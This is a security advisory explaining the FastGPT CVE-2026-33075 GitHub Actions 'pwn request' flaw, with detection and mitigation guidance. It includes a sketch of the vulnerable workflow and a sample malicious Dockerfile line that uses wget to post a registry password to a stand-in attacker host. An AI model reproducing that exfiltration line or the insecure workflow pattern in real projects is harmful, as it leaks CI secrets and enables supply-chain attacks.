CVE-2026-33075 Overview
CVE-2026-33075 is a critical arbitrary code execution vulnerability in FastGPT, an AI Agent building platform. In versions 4.14.8.3 and below, the fastgpt-preview-image.yml GitHub Actions workflow is vulnerable to arbitrary code execution and secret exfiltration by any external contributor. The workflow uses pull_request_target (which runs with access to repository secrets) but incorrectly checks out code from the pull request author's fork, then builds and pushes Docker images using attacker-controlled Dockerfiles. This vulnerability also enables a supply chain attack via the production container registry.
Critical Impact
External attackers can execute arbitrary code with access to repository secrets, exfiltrate sensitive credentials, and potentially inject malicious code into production Docker images, compromising the entire software supply chain.
Affected Products
- FastGPT versions 4.14.8.3 and below
- FastGPT GitHub Actions workflows using fastgpt-preview-image.yml
- Production container registries consuming FastGPT Docker images
Discovery Timeline
- 2026-03-20 - CVE-2026-33075 published to NVD
- 2026-03-23 - Last updated in NVD database
Technical Details for CVE-2026-33075
Vulnerability Analysis
This vulnerability represents a dangerous pattern in GitHub Actions security where the pull_request_target trigger is misused. Unlike the standard pull_request trigger which runs workflows in the context of the fork with limited permissions, pull_request_target executes in the context of the base repository with full access to repository secrets.
The critical flaw occurs when the workflow checks out code from the pull request head (the attacker's fork) rather than the base branch. This allows an external contributor to submit a malicious pull request containing a modified Dockerfile or workflow code that will be executed with elevated privileges.
The vulnerability falls under CWE-494 (Download of Code Without Integrity Check), as the workflow fetches and executes code from an untrusted source without proper validation. An attacker can leverage this to exfiltrate secrets such as API keys, deployment credentials, and container registry tokens.
Root Cause
The root cause is the insecure combination of pull_request_target trigger with a checkout action that retrieves code from the pull request branch instead of the base repository. The pull_request_target event was designed to allow maintainers to add labels or comments on pull requests from forks, but when combined with code checkout from the fork, it creates a privilege escalation vector.
The workflow configuration fails to implement proper security boundaries between untrusted contributor code and privileged operations like Docker image building and pushing.
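The insecure combination described above can be sketched as a minimal workflow. This is an illustrative reconstruction, not the verbatim contents of fastgpt-preview-image.yml; the job names, step order, and secret names are assumptions:

```yaml
# Illustrative reconstruction of the vulnerable pattern -- not the
# verbatim fastgpt-preview-image.yml; names and steps are assumed.
name: preview-image
on:
  pull_request_target:   # runs in the BASE repo context, with secrets
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # DANGEROUS: checks out the attacker-controlled PR head, so
          # the Dockerfile and build scripts below are untrusted code
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: docker/login-action@v3
        with:
          username: ${{ secrets.DOCKER_USERNAME }}  # registry credentials
          password: ${{ secrets.DOCKER_PASSWORD }}  # exposed to this run
      - run: docker build -t preview-image . && docker push preview-image
```

The combination of a privileged trigger, a checkout of the PR head, and a build step that executes attacker-controlled files is what turns a routine preview build into a code-execution vector.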
Attack Vector
The attack is network-accessible and requires only low privileges—an attacker simply needs the ability to open a pull request against the repository. The exploitation flow involves:
- An attacker forks the FastGPT repository
- The attacker modifies the Dockerfile or related build scripts to include malicious commands
- The attacker opens a pull request to the main repository
- The fastgpt-preview-image.yml workflow triggers with pull_request_target
- The workflow checks out the attacker's malicious code
- Malicious commands execute with access to repository secrets
- Secrets can be exfiltrated to attacker-controlled servers
- Compromised Docker images may be pushed to production registries
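As a concrete illustration of the Dockerfile-modification step, the change can be a single added instruction. This is a hypothetical sketch: the base image, the build argument, and the attacker.example endpoint are all placeholders, not observed exploit code:

```dockerfile
# Hypothetical malicious change in the attacker's pull request. RUN
# instructions execute during "docker build" on the privileged runner.
FROM node:20-alpine
# If the workflow forwards secrets as build arguments (a common pattern
# for registry builds), they become visible to attacker instructions:
ARG DOCKER_PASSWORD
RUN wget -q --post-data "pw=$DOCKER_PASSWORD" https://attacker.example/c || true
COPY . /app
```

Note that the attacker does not need to touch the workflow file itself: because the workflow checks out the PR head, any file the build consumes is already under the attacker's control.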
This class of GitHub Actions misconfiguration is commonly known as a "pwn request": a privileged pull_request_target workflow executing untrusted code from a fork. For detailed technical analysis, see the FastGPT Security Advisory.

Detection Methods for CVE-2026-33075
Indicators of Compromise
- Unexpected pull requests from unknown contributors triggering the fastgpt-preview-image.yml workflow
- Unusual outbound network connections from GitHub Actions runners during workflow execution
- Modified Dockerfiles in pull requests containing suspicious commands or network calls
- Unauthorized Docker image tags appearing in the container registry
- Evidence of secret access or exfiltration in workflow logs
Detection Strategies
- Audit GitHub Actions workflow runs for the fastgpt-preview-image.yml file, focusing on pull requests from external contributors
- Monitor container registry for unauthorized image pushes or unexpected image modifications
- Review workflow execution logs for anomalous commands or network activity
- Implement GitHub repository rules to require approval before running workflows on pull requests from first-time contributors
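The audit suggested above can be partially automated by scanning a local checkout for the dangerous trigger/checkout combination. This is a heuristic sketch: it flags candidates for manual review rather than confirming exploitability, and the pattern coverage is an assumption:

```shell
#!/bin/sh
# Heuristic scan for the "pwn request" pattern: a workflow triggered by
# pull_request_target that also checks out the PR head. Flags candidates
# for manual review; it cannot confirm exploitability on its own.
scan_workflows() {
  dir="$1"
  for f in "$dir"/*.yml "$dir"/*.yaml; do
    [ -f "$f" ] || continue
    if grep -q 'pull_request_target' "$f" &&
       grep -Eq 'github\.event\.pull_request\.head\.(sha|ref)' "$f"; then
      echo "SUSPICIOUS: $f"
    fi
  done
}

# Scan the conventional workflows directory of the current checkout.
scan_workflows ".github/workflows"
```

A match is not proof of vulnerability (the checked-out code may never be executed with secrets in scope), but every match deserves a manual review of what the workflow does after checkout.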
Monitoring Recommendations
- Enable GitHub Advanced Security features to scan for vulnerable workflow patterns
- Configure alerts for any workflow runs triggered by pull_request_target events
- Implement container image signing and verification to detect supply chain compromises
- Set up monitoring for secret access patterns and unusual API calls using exposed credentials
How to Mitigate CVE-2026-33075
Immediate Actions Required
- Disable or modify the fastgpt-preview-image.yml workflow to prevent execution on untrusted pull requests
- Rotate all repository secrets that may have been exposed through workflow executions
- Audit recent pull requests for signs of exploitation attempts
- Review container registry for potentially compromised images and remove any unauthorized artifacts
- Enable branch protection rules requiring workflow approval for external contributors
Patch Information
A patch was not available at the time of publication. Organizations should monitor the FastGPT Security Advisory for updates regarding an official fix.
Workarounds
- Modify the workflow to use pull_request trigger instead of pull_request_target where possible
- If pull_request_target is required, ensure the workflow only checks out the base branch code, not the pull request head
- Implement workflow approval requirements for first-time contributors using GitHub's built-in settings
- Use GitHub Environments with required reviewers to gate sensitive operations like Docker image pushing
- Consider removing the vulnerable workflow entirely until a secure implementation is available
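The base-branch-checkout workaround above can be sketched as follows. This is illustrative; adapting it to the real workflow is left to maintainers:

```yaml
# Illustrative safer variant: keep pull_request_target for secret-gated
# steps, but never build code from the PR head.
name: preview-image
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # No "ref:" override: under pull_request_target, actions/checkout
      # defaults to the BASE repository's branch, so the Dockerfile and
      # build scripts are maintainer-controlled.
      - uses: actions/checkout@v4
      - run: docker build -t preview-image .
      # Alternatively, switch the trigger to plain "pull_request", which
      # runs in the fork's context without access to repository secrets.
```

The trade-off is that a base-branch checkout cannot preview the contributor's changes; if previewing fork code is the whole point of the workflow, the pull_request trigger without secrets is the safer design.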
```shell
# Configuration example - Workflow approval settings
# Navigate to: Repository Settings > Actions > General
# 1. Under "Fork pull request workflows from outside collaborators",
#    select "Require approval for all outside collaborators"
# 2. Enable required reviewers for workflows accessing secrets:
#    Repository Settings > Environments > [environment_name]
#    Add required reviewers before deployment
# 3. Audit current workflow permissions
gh api repos/{owner}/{repo}/actions/permissions
# 4. Review recent workflow runs for suspicious activity
gh run list --workflow=fastgpt-preview-image.yml --limit=50
```

